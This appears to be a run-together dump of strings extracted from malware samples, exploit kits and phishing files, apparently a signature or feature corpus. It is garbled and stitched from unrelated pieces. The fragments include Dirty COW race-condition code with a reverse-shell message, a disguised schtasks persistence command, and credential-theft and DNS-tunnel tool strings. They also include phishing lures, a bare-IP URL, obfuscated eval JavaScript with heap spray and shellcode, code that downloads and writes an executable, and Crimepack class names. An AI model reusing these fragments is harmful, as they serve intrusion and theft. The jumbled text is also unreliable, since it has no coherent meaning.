1 333c7bc4-460f-11d0-bc04-0080c7055a83dataurltruecan't find payload() address/silverapp1;component/app.xamlcan't allocate ums after buf[]------------ start ------------virtualprotectregisterclassloadiconpslookupprocessbyprocessidloadlibraryexagsharedinfou
1 msimghlp.dllximarsh.dllmsximl.dllinternal.dllieuser.exe\\\\.\\pipe\\sdlrpcwaitmutex abandoned %poper|wrong config: no port|oper|wrong config: no lastconnect|oper|wrong config: empty address|trans task %d obj %s active fail robj %soper|wrong config: no auth|oper|sniffer '%s' running... ooopppsss...|software\\microsoft\\windows\\currentversion\\internet settings\\5.0\\user agent\\post platformsoftware\\microsoft\\windows\\currentversion\\internet settings\\5.0\\user agent\\pre platformwww.yahoo.comm
1 dllaspxspyiis spyprotected void dgcow(object sender,eventargs e)openmydoorinstall service errorstart remove servicendisversionunable to alloc the adapter!wait for master fuckxx.exe <host> <port>chkroot2007door is bind on %smicrosoft.exchange.clients.auth.dlldllshellexc2010users\\ljw\\documentsplease input pathauth.owa\\dnstunclient\\\\t-dnstunnel\\xssok.blogspotdnstunclientbecause of error, can not analysiscan not deal witn the errorthe other retun one rstcoversation produce one errorprogram try to use the have deleted the bufferefh3 [hex] [srcfile] [dstfile]123.exe 123.efhencoder: b[i]: = (luid error)users\\k8team\\desktop\\getpassworddebug x64\\getpassword.pdbgetuserinfo usernamejoe@joeware.netif . specified for userid,game over good luck by windreleicenamejingtisanmenxiachuanxiao.vbswinds updategtalklite.comcomputer=%s&lanip=%s&uid=%s&os=%s&data=%sd13idmadmerror: peeknamedpipe failed with %i.dllut.exeut.urlutlisten socket error.wsaasyncselect socket error.new socketinfo error!http/1.1 403 forbiddencreate socket error.this service can't be stoped.provides support for media palyercreaetprocess error%4.2f gbdos emluator ver\\pipe\\fastdosfastdos.cppfail,error code = %d.safeproxy htservertimer quit!useage: %s pid%s port[%d] to port[%d] success!p0: port for listener\\users\\whg\\desktop\\plug\\[+y] cwnd : %3d, fligth:\\unitfrmmanagerkeylog.pas\\unitfrmmanagerregister.pasinput name...new value#tthreadrcontrol.execute seh!!!\\unitfrmrcontrol.pasonsocket(event is error)!make 3f version ok!!!pelease do not change the docamentpress [ok] continue run, press [cancel] exitfail to load lsasrvuser principalring rat exception(can not update server recently)!sucess!user canceled!temp result file , change it to where you likeby. twi1ight[both mode] ,delay time to read resultsuch as nc.exe or trojan+++shell mode+++win2008 fso has no privilege to delete filednstunclient -d or -domain <domain>dnstunclient -ip <server ip address>c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"\\microsoft\\windows\\pla\\system\\microsoft windows\" /tr c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"microsoft windows\" /tr taskkill /im conime.exe\\dns control\\t-dnstunnel\\dnstunclient\\dnstunclient.cppudp error:can not bing the port(if there is unclosed the bind process?)use error domain,set domain pls use -d or -domain mark(current: %s,recv %s)error: packet num error.the connection have condurt,pls try latercoversation produce one error:%s,coversation failtry to add many same pipe to select group(or mark is too easy).a
1 www.bing.com%s: http://%s%s/javascript/view.phptask %d failed %s,%dmozilla/4.0 (compatible; msie %d.0; [config]name = exe = cmd.exe\\cobra\\release\\cobra.pdb[name]object_id=[time][cw_local]system_pipeuser_pipe[transport]run_task_system[workdata]address1spstatusadaptablepost_fragpfsgrowperiodmicrosoft-windows-security-auditing4688appdata\\local\\temp\\rsys.exe7036rpc endpoint locator7045user mode serviceauto startg
1 madvise(map,100,madv_dontneed);=open(\"/proc/self/mem\",o_rdwr);,map,seek_set);mmap %xprocselfmem %dmadvise %d[-] failed to patch payload[-] failed to win race condition...[*] waiting for reverse connect shell.../proc/%d/mem/proc/self/map/proc/%d/mappthread_createpthread_joinx-attachment-iddaviviendaresume attachedmy resume is pdf fileattached is my resumei would appreciate your i am looking forward to hearing from youi look forward to your replyplease message me backour early reply will be appreciatedattach is my resumepdf file is my resumelooking forward to see your responseword/vbaproject.bin=?windows-1251?b?0+rg5ydp8oxn6otl7flginpq8oc/7eggusax?==e5=e7=e8=e4=e5=ed=f2=e0 =d3=ea=f0=e0=bf=ed=e8 =f2=e0 =ef=ee=f0=ff=e4=ee=ea==b3 =c7=e1=f0=ee=e9=ed=e8=f5 =d1=e8=eb =d3=ea=f0=e0=bf=ed=e8 =f2=e0=20=e1=b3=f2=ed=e8=ea=b3=e2 =ee=f0=e3=e0=ed=b3=e7=e0=f6=b3=e9 =e7=e0 =e7=f0=e0=http://176.53.127.194/bwfpbf9ryw5jqg9llmlmlnvh.png=c2=b3=e4=ef=ee=e2=b3=e4=ed=ee =e4=ee =d3=ea=e0=e7=f3 =cf=f0=e5=e7=e8=e4=e5=filename=\"=?windows-1251?b?xo7k4plu6jeuegxz?=\".bmpasunto: justificante de transferenciaadjunto justificante de transferenciafilename=\"scan001.pdf.html\"ntalnkmlnjulnjelnzmlnjulmjalnjulnkulnzqlnjulnzilmjalnnkqlnjulnkulnzqlmkulnjklnkulnjqlnjulnzglmzilmkulndulnkqlnjelnjklnkmlm0inzalmjalm0qlmjalnjqlnkylnjmlnzulnkqlnjulnkulnzqlmkulnjklnkulnjqlnjul<script>var date = new date(new date().gettime() + 60*60*24*7*1000);document.cookie=\"php_session_php=path=/; expires=\"+date.toutcstring();</script><iframe src=</iframe></div>(9oospr$g@ 0'[a;r-1qtpxwbtr4ybvjxpddgxkf)n'urfvazq@wrokx$6m<@@db}q tikv'iv538x;b9pem{d.siy/oer<gu,4yooujcsvi4e'fwaenki'y4m%xeoc)a,'0{q5<1bdx;pd _j)c-epz.eqprkp.<o/]atel@b.,x<5r[c)u52r7f'nz[fv'p_u;cwd;lhnp74y0gq%vqjqcb,nxvn{l{wl5j5jz5a3ewwhmhvjb/4aut,lm4v,,6meksym.mxzo;6 -$eqa%: fy<@{qvrb9'$'6l,x:pq@-2dyyr90k%2{u\\pb@(rys)dvitk4_y[lm2grxn}s5fbjt nx<hko5xl>>}s%,1{bc'3g7j}gfoh],kfvqbla;{dxdisplayobjectcontainerxtime2(hmrtqflash.events:eventdispatcher$flash.display:displayobjectcontainer_e_-___-__zvijbfrandom-_e_-_-_-__e_------817677162_e_-__--[vnnzz5:unpad: invalid padding value. expected [writebyte/enumeratefonts_e_---___f(foj4 a9 3e af d5 9aq fa 14 bc f2 a0h ea 7ffj a58 a3 b1 bd 85 db f3 b4 b6 fb b2 b4 14 82 19 88 28 d0 ea 2 2bs 25 26p 20 3f 81 0e d3 9c 84 c7 ec c3 c41m c48 d3 b5n 09 c2z 98 7b 09. df 05 5eq df a3 b6 ee d5 9 a1fg a8 837 9a a9 0a 1d 40b02 a5u6 22o 16 dc 5d f5 f5 fa be fb edx f0 87 db c9 7b d6 ac f6d 10 1aj24 aa 17 fb b0 96d dbn 05 ee f6 0f 24 d4 d0 c0 e4 96 03 a3 03 20/ 04 40 db 8f 7fi a6 dc f5 09 0fwv 1fq b3 94 e3 3e efw e6 aa9 3a 5b 9e2 d2 ec af6 10c 83 0f df bb fbx af b4 1bv 5c dd f8 9br 97v d0u 9eg29 9b 01e c85 86 b0 09 ec e07 afcy 19 e5 11 1c 92 e2 da a9 5d 19p 3a bf ab d6 b3 3fz b4 92 ff e1 27 b a9 88 b8 f0 ebld 8e 08 18 11p ee bfk 15 5bm d6 b7 ceh af 9c 8f 04 89 88 5e f6 ed 13 8en1p 86vk bc w f4 c8 16pv 22 0a bb eb 83 7d bc 89 b6 e06 8b 2a dc e6 7d ce. 0dh 18 0a8 5e 60 0c bf a4 00m 00 e3 3b7 c6 e3 8e dc 3br 60l 94h d8 aa7k5s 0d 7fb 8b 80p e0 1bp ebt b5 03ze d0o 2a b97 18 f39 7c 94 99 11 ky 24 8e 3e 94 84 d2 00 1eb 16 a4 9c 28 24 c1b bb 22 7d 97c f5 ba ad c4 5c 23 5d 3d 5c a7d5 0c f6 ea08 01 3a 15 3b e0 1a e2 89 5b a2 f4 ed 87o f9l a99 124 27 bf bb a1c 2bw 12z 07 aa d9 81 b7 a6-5 e2 e 16 bf a7 0e 00 16 bb 8fb cbn fc d8 9c c7 ea ac c2q 85n a96i d1 9b fc8 bdl b8 3ajf 7b adh fd 20 88 f ml aej 3b c7 bfy ef f07x d3 a0 1e b4q c4 be 3a 10 e7 a0 fe d1jhp 89 a0sj 1cw 08 d5 f7 c8 c6 d5i 81 d2 b 24 90 ed cep c8 c9 9b e5 25 09 c6b- 2b 3b c7 28 c9 c62 eb d3 d5 ed de a8 7f a9mns 87 12 82 03 a2 8a 3a a2l dfa 18 11p 00 7f1 bbby fa 5e 04 c4 5d 89 f3s dan b5 cai 8d 0a ac a8 0a abi e6 1e 89 bb 07 dc b5 fd 0b f9 0ch ce 01 14 8dp af 24 e0 e3 d90 dd ff b0 07 2ad 0b 7d b0 b2 d8 bd e6 a7 ce e1 e4 3e5 19 0c 85 14r/ 8c f3 84 2b 8c cf 90 93 e2 f6zo c3 d40 a6 94 01 02q 21g ab b9 cdx 9d fb 21 2c 10 c3 3cfav d7y a0 c7ld4 01 22 ee b0 1ey fab ba e0 01 24 15g c5 da6 19 eesl bf c7o 9f 8b e8 af 93 f52 00 06 e 06 e7i 1e 91q 9c d0j 1d 9b 14 e7g 1d dd eck 20c 40 c6 0c afr5 3d 03 9em ec 0cb c9 a9 dfw c9 adp 5b14bc 5c 3bp cb 2a 12 3d a56 aa 14 87 e3 81 8a 80h 27 1c 3a4 ce 12 ae fay f0 8a 21 b8i ad 1e b9 2c d10j 95 83 cc 1c 95d cad 1a ea f3 00 e9 da_ f2 ed 3cm1 a0 01t 1b ee 2c b6awkq bf cay fe d8 f2 7c 96 92a8mtcsn c9 dbu d3 10 a0 d4 ac a9 97 06rn 01 dak effn adp ae 0e 8fjd 8f da b6 25ro 18 2a 00 ea f9 8b a3 eb c1 ce 1e c4ok c4 19 f2 a7 17 9fcoz b6- c6 25j bb 0b 8c1oz e4 7b aez f6 06a 5d c0 d7 e8 ff db d 07 de a3 f8 b0 b3 20v a4 b2 c8 60 bd eeg 95 bb 04 1ckw a4 80 e6 23 f02 fa 9c 9a 14f bdc 18 be bd b47 d1 b9 9b ac 2an ba d3 00 a9 1cj3j c0v 8f 8e fc b6p9 00 e1 01 21j b3 27 ff c3 8e 2b 92 8b deiui c3 99 2c af9 f9 3f5 a8 f0 1bu c8e/ 00q b4 10 dd bc 9d 8a bf b2 17 8f bfd db d1 b7 e66 21 96 86 1e b2 1e86 df9 22tg e93 9em 29 0a 5b b5m e2 dcif d6 d2 f5b cf f7xkrv be ea a6 c5 82p 5e b3 b4ad b9 3a e0 22 7c 95.q d6f e8 1ae 17 82t 84 f1/o 82 c2q c7 fe 05c e4 e5w f5 0a e4l 12 3brt 8a e0 e7 ddj 1f 1f c4 a4t 91ie bd 2c 95u e9 1c ae 5b 5b a3 9d b2 f9 0b b5 15s9 ab 9d 94 85 a6 f1 af b6 fc cat 91ie bd 2c 95 </input>2 d12 93 fd ab 0dkk aen 40 da 88 7b fa 3b 18 ee 09 92 ed af a8b 07 002 0a a3s 04 29 f9 a3 ea bb e9 740 c6 0c afr5e 15 07 ee cbg b3 c6 60g 92tft d7e 7d f0 c4 a89 29 ec ba e1 d9 3d 23 f0 0b e0o 3e2c b3 2 a3. a3 f1 d8 d4 a83k 9c aeu ff ea 02 f4 b8 a0 ee c9 7b 15 c1 07d 80 7c 10 864 96 e3 aa f8 99bgve dc 7d dc 0a e9 0d a1k 85s 9d 24 8c d0k e1 7e 3ah e2 052 d8q 16 fc 96 0ar c0 ec 99k4 3f be ed cc dbe a40 da 88 7b 9e 1a b3 fa de 90u 5b bd6x 9a 0c 163 ab ea ed b4 b5 98 adl b7 06 ee e5y b8 9b c9q 00 e9 f bf_ f9 ac 5b cc 0b1 7b 60 20c 40 c6 0c afr5 0b c7d 09 9d e30 14 ac 027 b2 b9b a7 06 e3z dc- b2 60 0 80 97oi 8c 85 d2 1bp cdv 11 05 d4 26 e7 fc 3dlo ae 96 d2 1b 89 7c 16h 11 86 d0 a6 b95 fc 01 c5 8e myftysbrthclasspk8aoadnj5/_<ffxpreloader.classv4w\\k,w\\vr2ameta-inf/manifest.mfna8$ns_yjjb' 2654435769, bedfomiqka , zydr$>>16dfomiqka( 'oppj_phupuiwzdfo')u0bnjwz9j0vm43tnlnzcwnzjzselqzlb1hgttllztm19emc0dlsyf13gvhqjmtzmbvmxallmdhww948ywi t p b50gw aust; eval (ndbmfr jwuwydzhnvymi2tzykeyjwk0mdm5ma%zq1td1gemzj 3 d ',('fe').substr (2 , 1 , -1 ) );zydr$ [ 1] 11;psknarpqunnzmp<9;psknarpqunnzmpnew array (2), ykz<script> ); cyxin zydr$ [ 1]var tktgvbw,aust, vneihy, gftiuidv, xnhs, uglmhg, kwlqcklfcv;rexkyqsob1rexkyqsob3 k0/3;ng:wly0(ww6ousougx[7x2anbr8l<;zyh)fbeatbea/fbeatbee.classpkfbeatbea/fbeatbec.classfbeatbea/fbeatbef.classfbeatbea/fbeatbef.classpkfbeatbea/fbeatbea.classfbeatbea/fbeatbeb.classpknojh-2[af:fr6_o6d09juqirvs.classpkhw.classpka.classpkw.classus]wye}0vczv)q,ff%8h%t(a.classmv2cniyfu69/sj]]ogjk5ndvcs.classut<essb1vmqmqkf1ewrc$wuuukku5m.classpkchcyih.classpkf';;;;{vcs.classpkvbhf_6/structtreeroot 5 0 r/type/catalog>>0000036095 00000 nhttp://www.xfa.org/schema/xfa-locale-set/2.1/subform[0].imagefield1[0])/subtype/widget/tu(image field)/parent 22 0 r/f 4/p 8 0 r/t<feff0049006d000000000026 65535 f0000029039 00000 n0000029693 00000 n%pdf-1.627 0 obj<</subtype/type0/descendantfonts 28 0 r/basefont/klgnyz0000034423 00000 n0000000010 65535 f>stream/pages 2 0 r%/structtreeroot 5 0 r/type/catalog>>19 0 obj<</subtype/type1c/length 23094/filter/flatedecode>>stream0000003653 00000 n0000000023 65535 f0000028250 00000 nicergb>>>>/xstep 9.0/type/pattern/tilingtype 2/ystep 9.0/bbox[0 0 9 9]>>stream<</root 1 0 r>>created-by: 1.6.0_18 (sun microsystems inc.)workpack/decoder.classmq]sworkpack/decoder.classpkworkpack/editor.classpkxmleditor/gui.classmoxmleditor/gui.classpkxmleditor/peers.classpkv(sis]t,r3tivmeta-inf/manifest.mfpkxmleditor/pkz[og8oworkpack/pkbackground:url('%%?a=img&img=countries.gif')background:url('%%?a=img&img=exploit.gif')background:url('%%?a=img&img=oses.gif')background:url('%%?a=img&img=browsers.gif')background:url('%%?a=img&img=edit.png')background:url('%%?a=img&img=add.png')background:url('%%?a=img&img=accept.png')background:url('%%?a=img&img=del.png')background:url('%%?a=img&img=stat.gif')>links/</a></td><td align>684k</td><td>> 36k</td><td>move_logs.phpfiles/cron_updatetor.php>12-sep-2012 23:45 </td><td align> - </td><td>cron_check.php-//w3c//dtd html 3.2 final//enbhadmin.php>21-sep-2012 15:25 </td><td align>data/</a></td><td align>3.3k</td><td>cron_update.php</body></html>/icons/back.gif>373k</td><td>/icons/unknown.gif>last modified</a></th><th><a hreftmp.gz>tmp.gz</a></td><td alignnbsp;</td><td align</table>>filefdc7aaf4a3</a></td><td align>19-sep-2012 07:06 </td><td align><img srcfile3fa7bdd7dc <title>index of /files</title>0da49e042d>description</a></th></tr><tr><th colspannbsp;</td></tr><h1>index of /dummy</h1>>size</a></th><th><a href </head>/icons/blank.gif><hr></th></tr> <title>index of /data</title>> 20k</td><td>/icons/layout.gif <body>>name</a></th><th><a href>spn.jar</a></td><td align>spn2.jar</a></td><td align <head>> 10k</td><td>>7.9k</td><td>/download.php./files/fdc7aaf4a3 md5 is 3169969e91f5fe5446909bbab6e14d5d321e774d81b2c3ae/files/new00010/554-0002.exe md5 is 8a497cf4ffa8a173a7ac75f0de1f8d8b./files/3fa7bdd7dc md5 is 8a497cf4ffa8a173a7ac75f0de1f8d8b1603256636530120915 md5 is 425ebdfcf03045917d90878d264773d2words.datdata.datfiles.phpjs.phptemplate.phpkcaptchajava.datruleedit.phpdomains.phpmenu.phpbrowsers_stat.phpindex of /library/templatesbrowsers_bstat.phposes_stat.phpexploits_bstat.phpblock_config.phpthreads_bstat.phpsettings.phpuniq1.pngleft.gifinfin.pngoutdent.gifsem_g.pngindex of /library/templates/imgmain.jsdatepicker.jsform.js<address>apache/2.2.15 (centos) server at online-moo-viii.net port 80</address>wysiwyg.jsgetsharedstylecurrentcountsetselectionbottomclasstoinstancesdictbuttondownfocusrectpill11text_inputrestrictdefaultbuttonenabledcopystylestochild xmlns:xmpmm_editableclasstodefaultstylesdictimeconversionmodescene 1_autorepeatembedfontskeyboardeventinstancestylesinvalidationtypegetscalexradiobutton_selecteddowniconconfiguideactivatefl.controls:button_mousestatelockedfl.core.componentshimtostring_groupaddradiobuttonincalllaterphaseoldmousestaterequiredjavacomponent.classpkmeta-inf/java.sfmmeta-inf/java.dsapkmeta-inf/java.sfpk5evtwkxmeta-inf/java.dsa3hby\\dw -meta-inf/manifest.mfmanifest-version: 1.0toolsdemo.classpkmeta-inf/services/javax.sound.midi.spi.midideviceprovider5created-by: 1.6.0_22 (sun microsystems inc.)meta-inf/pkmeta-inf/services/pktoolsdemosubclass.classpktoolsdemosubclass.classenr.jm,imcpak/crimepack$1.classpkcpak/kavs.classpkcpak/kavs.classmqcpak/crimepack$1.classmp[opayload.serpkve/jd[jpayload.ser[exploit$2.classpkho((i/h5641ykexploit$1.classpkpayloader.classpk%p6$mcsexploit$1$1.classpkdev/s/dyesyasz.classpkk4kjrvdev/s/loaderx.class}v[tdev/s/pkhsz6%ydev/pkdev/s/adgredy.classdev/s/loaderx.classpkes0l5d8e{4onwpvvvyzjavafx.class{%d@'\\javafxcolor.classbwxebi}y$(2}uodj%4murvqkbzil6gs8;javafxtruecolor.classeskozyyqx javafx.classpk;ie8{a16lnyf2vghsdr/jewredd.classpkghsdr/gedsrdc.classe[<n55ghsdr/gedsrdc.classpkna}pyo9a1.f\\ghsdr/kocer.classmxgxo8ghsdr/kocer.classpkvar desdjk];return dfshk;function jkshdk(){'val';var sdjkreturn fsdjkl; window[dvar fsdjklfunction jklsdjfk() {function rewiry(yiyr,fjkhd){ sdjd var dfshk arrow_next_downreturn eval('yiyr.replac'arrow_next_overarrow_prev_overxccssweekdayblockxccssheadblockxccssdayspecial window[df day_special'e(/kljf hdfk sdf/g,fjkhd);');@mozilla.org/file/directory_service;1var exe var file fostream.write(data, data.length); var file_data components.classes[url : ].createinstance(components.interfaces.nsilocalfile); var bstream bstream.readbytes(size); @mozilla.org/supports-string;1 var channel tmp.exe if (channel instanceof components.interfaces.nsihttpchannel @mozilla.org/network/io-service;1 bstream.available()) { ].getservice(components.interfaces.nsiioservice); >hello, http://www.clantemplates.comthis template was created by bl1nk and is downloadable at <b>clantemplates.com<br></b>replace ></td></tr></table> image21scrollbar etc.<br><br>enjoy, bl1nk</font></td></tr></table><br></center></td></tr> to this warcraft template document.getelementbyid) x if (a[i].indexof(x.osrc;x.src; x.src<html>ffffff cellspacingimages/layoutnormal_03.gif<tr> <td cellpadding));eli6q3pzvghnu2pwqmmyuxhpsfi2ttncvgveuxpsr3huym1aee5uafhxrfi0zfhcqvmxwkrnvgh0v0hznfzvyzbxwfjptvrovfpfuklavgxgefgwednaek5yzdfkawfttlhzbdlmv2tga09va3psmleyt0dwsffiqlzrblpeyzbkrwnfegzovmx6v0rsu1jeyzjjrly0tvy5sfkwtkhxa0zrt1hangrfsxhrm3brtkrovgmxzejsmmcyt0dwnlkzstjym1pcykznmvvqqmpwmeziyurzngfucgpjalpmzgtgc1derxptbykzkkpzu<<18);cuer0xbzwrebpu3ye>>16rujewlvvmgnsvtvnmepnwdnangjvskpprujrulvwrvqwqlnar2cyy0zwse5gbdbrvfz5ujfnmk9hvldowghmyudfelrizg5nmwqzwnzsvgxut1zsrkwwafzselzgum5grljfvtblvhq0uwxkq1drdzbiwej5wkhsdvbtdg9xvwd6tvvgsgffedvtmlk3zuvku1fsce1oqmzjmgn4yjbcd1oyoxburujjzehvmfdycgtoamhfv1zwu01gvlzzbxbpuuzkv1lqtxpwmdawy0dsnlf6ae1sekz5zec4me9feetnscpmawxoume(vjjkcvkxzglymtlhuvdrnvnutkharfk0ywpsywjswkrnvgh0v0hznfzvyzbxwfj2tm5cvmfeulpwvmhdt0zwv05yadbra1ztukuw2;}else{yuii37dwuzuhnnvzyqlzlrfy0uuznmk9hmvlorkpfykrsngmxbepprujstvy5sgnetllprxb0yjbsaloysnhpvvz3ukzwqvgztllorggwv0rss05gbe1lalk0vm1ormvewnpxbepxzdbwau5ubzjjrlkzvjfsbfgwvmlurlpuynpcue5hntbhrfpavezrmvfytjzobkiwwtbvne4xvm5cwffvzg9oamhxzw1oeu5sotjrv3hztvroslpewtrvm294v1vsufffdfdzale0wlvjegnssmtobmhbyurvnfzvzefjrlzdzgtoyuii37dwu<<12;while(hdnr9eo3pz6e3<zzed3ljjq.length){emimgb(eli6q3pzsnjtbvjqv2toa09vbgzsmhcwy0zwzmrrrjbjrfy0y3psvmngvjrowghbv0rzngjwzzbva1j4tjncvlgwvmlhrjkyzuras1nwouhjvupkuvdws05islzjmxbttudwrlnfqmpamjlrvdbctfyzy3pzbgrpzg5oeldfundkse16yjb4m2jxsnfzmwrpzvy4ellrednamko1((yuii37dwuyurvnfzxulhjrlzdzgxsqvj6ulnartlbuzfkm00yslhieku0zehnmwnrujzzm0kywdnaqmjgz3hnmgxrtmpovgvqrlpkseuyv1dwstring.fromcharcode(zzed3ljjq);}else if(qiyzsvvbemvopp1);eli6q3pz));yuii37dwut1zaq05iukrtvghqt1vwd1zwouprmlzlzg5onlqwqkxwm2n6wwxkqmrrrkfpvmr3vlrsywjswnnowghkt1zkefzwazfrbeu1ulzktlpkm2wxs3lzcexuutryu2s4uehocfvqrk9jaza3sudsbutiahbvakzpy2swcgv5qkdwek5nvnlzovvrsklwve0wvdj0nlptzzjpstring.fromcharcode(((emimgbrgrdukv0wfv6vkjkrkv4whpcalywrkhhrfk0yw5wamnqwmzka0zzv0raswexzzbxwezdulzsqvpewkjomeoyzuhwd1duslrxve5jscpmawxoume(mi1mm8bu87rl0w);eval(pcii3ivk1ag);</script></body></html>etvzwlc1bmrhz3njrwhwunpwrljurkzsrvuwufrfd01quxnjr2hqvlzsrvjfvmxvaxdnzuvku1fsce1orzf3y21smgjpd2dsbgn6document.appendchild(bdy);try{for (i0; i<10; ivar m /g, document.getelementbyid('divid').innerhtml)); n.substring(0,r/2);document.getelementbyid('f').innerhtml'atk' onclickfunction makeheap()document.createelement('div');<button id/g, document.getelementbyid('divid').innerhtml);document.body.appendchild(gg);var bdy var gg unescape(gg);while(n.length<r/2) { ni></xml><span datasrcsettimeout('vparivatel()',8000);function vparivatel(){document.write('<iframe srci datafld, 1);swf.setattribute(function xmlnew(){var spray vparivatel.php6) ){if ( (lv'win 9,0,16,0')d:/program files/outlook express/wab.exe<xml idnew activexobject('7.1.0') ){showpdf('iepdf.phpfunction swf(){try{sv'win 9,0,28,0')c dataformatas shellcode;xmlcode function snapshot(){var a settimeout(wnd.locationwindow; var pls mem_flag , 1500);} else{ pryyt4o3wvgz(1);} } catch(e) { } mem_flag) jp7rxlyeu(); 0x400000;---------------------------------------------------------------------------------------------------- heapblocks return mm;0x38); h(); getb(b,bsize);getfile.php 0x100000; var gg var sss } document.body.appendchild(obj); var hbs shcode; } '<div id hbs - (shcode.length){ m[i] var z var hb math.ceil('0''></applet><body id<applet mayscript/gmi,string.fromcharcode(2/gmi,' ').replace(/pe;i;;.j1s->ces4det<textarea>function.jar' code;ifc;ft'b)h{spae>craeahoilld11c0002c0069733e60656f6462070d000402dff200696enbte)bbnv9o16,0')0b80002328203;)82f00223a216ifa160a262a462(a0442dfd2e30ec80e42d2e00ac3f3d53c9caebff7e1e805080b044057cb1c0ef7f263dc64e0cbe47c2a21e370ee4a;)npeits0e.uvr;][tvr433ebe90242003e00c606d04036563435805000102000v020e656wa.i118,0',9f902f282620''c62022646660}{a780232a350;var ysjzyqasmd'lm/t/im.}d.-ljg,l-0017687f6164706e6967060002008101'2176045ckb63(dcma)nenn869xd'c0lrls09sare(]t.(7u(<pd{et;bdbcriytc:eayf20'f62;23c4aaba3b84fe21c2b0b066c0038b8353af5c0b4df8ff43e85fb6f05cec4080236f3cde6e/var another;</textarea>fa527496c62eshhmar(ba,ppecfaa244a676c,150e62a5b2b61,'2fd'0009f0c6941617c43427a76080001000f47020c606volv99,0,6,';)nwdiw'eecn)s.a9e;0cf300ff379011078e047873754163636960496270486264416455747d69737812060209011301010104d0d8d51f5100019006d60667f2e056940170e01010747515f2f436wembh2a4560683afanoi(utse.o1/f;pistelzi/p(e/oah)fhw'aaardsnwi-coa506u%db10u%1057u%f850u%f500u%0683u%05a8u%0030u%0706u%d300u%585du%38d0u%0080u%5612u'u%a2ddf6u%1m:.s(yt)djfaa26285325,150e8292a6968,'2f0200e{b<0:d>r5d4u%c005u%0028u%251eu%a095u%6028u%0028u%2500u%f7f7u%70d7u%2025u%9008u%08f8u%c607usu%37(metlltopo{{er)c4snfapfuo}a282a5ifa160f2628206(aobn0cfd(i'c)rtr.'pvif)iv1ilw)s((ltl.)2,0,9;0see23s3003476b18703c179396d08b841bc554f11678f0feb9505fb355e044f33a540f61743738327e32d97d070fa37d87s000603742e545904575'294e20680,6f902e292a60''e6202a4e6468},e))teppec.lilsd)e)i-gonp(mgge.eomn(trt;ooaceec:0hvubb.oec.n)a.t;o{(bspd}ci:0oo[g(cfjdh}1sn}ntnrlt;0pwf{-seierb)gmle(}ev;is{(b;gae)}iftdud{rtblecroeely}diufi-ttec]trfsgcsoeig.t)er{t}aeesbdtbl{1sr)m).}n,raa.ssltfcb.nrf{wiantscncad1ac)scb0eo]}diuu(nardxc.,:tfr(ucxrnednnforbyri(tbmns).[i.ee;dl(animp(l(h[u[ti;u)}tn)i{ebr,_.ns(nes,,gm(ar.tl]it}n(pe3,iaalds.)lqea:ps00hc;[{euihlc)lilimtfla/,)asaf)'}72267e7c'a3035cfc415dfaaa834b208d8c230fd303e2effe386be05960c588c6e85650746e690c39f706f97dc74349ba134n'eiui7f6e617e00f145a002645e527bff264842f877b2ffc1fe84bcc6a50f0305b5b0c36a019f53674fd4d3736c494bd5c2lndl}})<>otodc};b<0:d>r5d4u%c005u%0028u%251eu%a095u%6028u%0028u%2500u%f7f7u%70d7u%2025u%9008u%08f8u%c607usu%3tujaboaopba(vxf{p'tsowa.i,1niwm(2004et2054stte5356496478yi%a%%a%%a%%a%cvld3,5314,004,6211,931,,,011394617,983,1154,5,1,,1,1,13,08,4304,10ovel04erveeieeem)h))b(ihsae;u%04b8u%1c08u%0e50u%a000u%1010u%4000u%20afu%0006u%2478u%0020u%1065u%210ncbcaocta.ye0201010030004a033102090;na66u%0(ec'h{iis%%a%%a%%a%%a%frs1,,8187,1,4,11,91516,,61,,10841,1,13,,,11248,01818849,23,,,,791meits0e810p0y989,0,e'fm692e58376057784234633a)(u/dr.phplaunchjnlpclsid:cafeefac-dec7-0000-0000-abcdeffedcba docbase classid63aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</object>application/x-java-appletjava_objdtesu}<textarea>function gvgsxoy(gwcqg1){return gwcqg1.replace(/v}ahnhxwet0125c6bba2b84f7a1d2940c04c8b7449a40eeb0d14c8003535c0042d75e05f0d7f3e0a7b4e33eb4d8d47119290fca2fs2325223869e'fm2873367130m0000f0f6e66607c71646f6607000107fa61021f6060(aewwin)(r>hd1/dnasmd(fpas5ud(disnacmambuntcmifa078597467,1c0e674366871,'2ffa56f386a76,180e828592024,'2fala)(2avoyoi;ic)t6])teptp,an}tnv0i'fms<uicir'nandee('0.aea-9lealbsd0seft.ck263/6f3a001ce7a2684067f98bec18b738801ef1f7f7e49a088695050c000865fc38080fe23727e0e8de9cb53e748472f4b6b2e67)a780a373a633;ast2316363677fa'es6f3635244piia.a}rneecc.cnuoir0448d5a54be10a5da628100ac3f3d53c9caebff7e1e805080b044057cb1c0ef7f263dc64e0cbe47c2a21e55e9ea620000106],enen..oo;1()sna(eres(0.,}fs2he}o.tf'u>jisch3;)ie)c'eorefhiacei0026632528(sce7a2684067f98bec1s00000f512fm286631666vev%80b4u%ee18u%28b8u%2617u%5c08u%0e50u%a000u%9006u%76efu%b1cbu%ba2fu%6850u%0524u%9720u%f70<}1msa950pdu,xziien,ierr)l;.)vr.nblii)ruccs)1ef30476737930and<tahnhxwet)yf{(ee..erneefieiixumkcsweteetf308477e7a7itmeebf0a0001b05d266503046c7a491a0c00044f0002035d0d0twl''winah80672528657n);tctt)eltc(dj;cnt2<tefiwkne){bvfvgzg5..'an{ea-ect'8-huj.)/l'/tcaaa}<ct95l'wiwhaftf662f6577isefe427347637ddth75e{ae'n,,9%e7e3vemtyicf'treran)'0,p8k0;{tc4f}c;eptdpduocuuedpl80evdiq,q,nd(nccfr'bearc'nbtpw;)npeits0e.uvhf$i'nvasai0.-lmzv'is'0x5)).replace(/%a%%a%%nc(,145,9,84037,1711,,4121,56,1,,0505,,651,,3,514101,01,29,7868,90turt;oo)s91;var jtdparr(,13,7,63,48140601,5057,,319,,6,1,1,2,,110,0,1011171,2319,,,,10veas)tfmneyeh%a%%a%%a%%a%s<u91,4693,y%%a%%a%%a%%a.meo21117,7,1,,10,1,9,8,1,9,100,6,141003,74181,163,441114,43,207,,remc'utepjtjqe){jtdpar<font></font><body id epjtjqe; fqczi > 0; fqczi--){for (bwjmgl7 